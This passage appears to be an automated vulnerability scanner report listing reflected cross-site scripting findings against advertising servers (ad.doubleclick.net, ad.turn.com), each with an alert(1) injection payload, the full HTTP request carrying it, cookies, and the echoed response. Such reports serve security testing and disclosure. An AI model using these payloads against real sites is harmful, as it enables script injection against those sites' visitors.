Mvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29http://www.tdameritrade.com/offer/250freetrades/?a=NVX&o=199&cid=GENRET;877237;62578498;239944784;41336049");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a68d"-alert(1)-"b83921a49ea was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyN
...[SNIP]...

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e083d"-alert(1)-"fd19c0fdbf9 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:28:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSp
...[SNIP]...

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f777b"-alert(1)-"69d52534c85 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0
...[SNIP]...

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37f3"-alert(1)-"174e9b66d51 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwy
...[SNIP]...

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a167"-alert(1)-"e2b4b064d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/click%3Bh%3Dv8/3afb/f/2e6/%2a/b%3B239944784%3B0-0%3B0%3B62578498%3B2321-160/600%3B41336049/41353836/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5o
...[SNIP]...

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de551'%3balert(1)//17b4bcec7f4 was submitted in the sz parameter. This input was echoed as de551';alert(1)//17b4bcec7f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.jobs/front;sz=de551'%3balert(1)//17b4bcec7f4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 355
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:06 GMT
Expires: Sun, 01 May 2011 23:39:06 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/d;240396230;0-0;0;5742660;255-0/0;41867457/41885244/1;;~okv=;sz=de551';alert(1)//17b4bcec7f4;~aopt=2/1/ff/1;~sscs=%3fhttp://www.esri.com/washpostrecruit">
...[SNIP]...

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6123"><script>alert(1)</script>730c7e9bf00 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=b6123"><script>alert(1)</script>730c7e9bf00 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx03